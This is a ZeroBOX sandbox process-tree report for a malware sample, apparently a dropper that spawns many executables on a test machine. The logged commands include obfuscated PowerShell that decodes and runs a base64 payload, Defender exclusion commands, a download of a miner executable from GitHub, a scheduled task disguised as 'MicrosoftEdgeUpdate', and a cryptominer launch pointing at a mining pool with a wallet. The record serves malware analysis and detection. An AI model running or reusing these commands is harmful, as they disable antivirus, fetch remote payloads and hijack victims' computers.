| ZeroBOX

download.php "C:\Users\test22\AppData\Local\Temp\download.php"
2056
- 1o76j7.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\1o76j7.exe
  2144
  - namez.exe "C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe"
    2276
    - de854920e3.exe "C:\Users\test22\AppData\Local\Temp\10000260101\de854920e3.exe"
      2796
    - LAc2heq.exe "C:\Users\test22\AppData\Local\Temp\10001030101\LAc2heq.exe"
      2904
    - Hmcm0Oj.exe "C:\Users\test22\AppData\Local\Temp\10001850101\Hmcm0Oj.exe"
      2980
    - 235T1TS.exe "C:\Users\test22\AppData\Local\Temp\10004650101\235T1TS.exe"
      1188
    - xztOH3r.exe "C:\Users\test22\AppData\Local\Temp\10013260101\xztOH3r.exe"
      2208
    - 94cd32df1e.exe "C:\Users\test22\AppData\Local\Temp\10036890101\94cd32df1e.exe"
      2260
    - i5Kz53x.exe "C:\Users\test22\AppData\Local\Temp\10037070101\i5Kz53x.exe"
      2608
    - cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd"
      2844
      - cmd.exe Cmd.ExE /c StARt /mIn PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
        1228
        
        powershell.exe PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
        2964
    - lBiQciH.exe "C:\Users\test22\AppData\Local\Temp\10064520101\lBiQciH.exe"
      2068
      - cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\pptvscyct', 'C:\Users', 'C:\ProgramData'"
        1520
        
        powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\pptvscyct', 'C:\Users', 'C:\ProgramData'"
        2224
      - cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/mineratowerst.exe' -OutFile 'C:\Users\test22\AppData\Local\pptvscyct\erfwnvwyrxrr.exe'"
        2332
        
        powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/mineratowerst.exe' -OutFile 'C:\Users\test22\AppData\Local\pptvscyct\erfwnvwyrxrr.exe'"
        2012
    - pOqYWAZ.exe "C:\Users\test22\AppData\Local\Temp\10068930101\pOqYWAZ.exe"
      2808
      - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\SystemService\install.bat" "
        2508
        
        net.exe net session
        2044
        
        net1.exe C:\Windows\system32\net1 session
        2468
        
        schtasks.exe schtasks /Create /F /SC ONLOGON /RL HIGHEST /TN "MicrosoftEdgeUpdate" /TR "\"C:\Users\test22\AppData\Roaming\SystemService\miner_loop.bat\"" /RU "test22"
        1600
        
        cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\SystemService\miner_loop.bat
        1552
        
        powershell.exe powershell -WindowStyle Hidden -Command "Start-Process -WindowStyle Hidden -FilePath 'C:\Users\test22\AppData\Local\Temp\SystemService\sysdrv.exe' -ArgumentList '--url pool.hashvault.pro:443 --user 82tLCbM64D89VX5zsHwjYpCu4WftAMF9AHzc5sd2ZLmHZBUZdwX6UJzEY1w4bwK5PhV4Tsh7kNUGXS8CynaTsvkADvcbvP6.TEST22-PC --pass x --donate-level 1 --tls --cpu-max-threads-hint=25'"
        1168
        
        crypted.exe C:\Users\test22\AppData\Local\Temp\SystemService\crypted.exe
        200
    - eZp5zCz.exe "C:\Users\test22\AppData\Local\Temp\10072280101\eZp5zCz.exe"
      1028
    - hvof1h0.exe "C:\Users\test22\AppData\Local\Temp\10073290101\hvof1h0.exe"
      2156
      - hvof1h0.exe "C:\Windows\Temp\{C114507B-F32B-4B28-B4B2-1318F2E1E559}\.cr\hvof1h0.exe" -burn.clean.room="C:\Users\test22\AppData\Local\Temp\10073290101\hvof1h0.exe" -burn.filehandle.attached=304 -burn.filehandle.self=312
        1704
    - lBiQciH.exe "C:\Users\test22\AppData\Local\Temp\10074640101\lBiQciH.exe"
      2336
      - cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\hjvegayfkdgz', 'C:\Users', 'C:\ProgramData'"
        1780
        
        powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\hjvegayfkdgz', 'C:\Users', 'C:\ProgramData'"
        3096
    - 235T1TS.exe "C:\Users\test22\AppData\Local\Temp\10074650101\235T1TS.exe"
      1516
    - i5Kz53x.exe "C:\Users\test22\AppData\Local\Temp\10074660101\i5Kz53x.exe"
      3192
    - cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\10074671121\690BRuM.cmd"
      3300
- 2m8357.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\2m8357.exe
  2320
explorer.exe C:\Windows\Explorer.EXE
1236

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents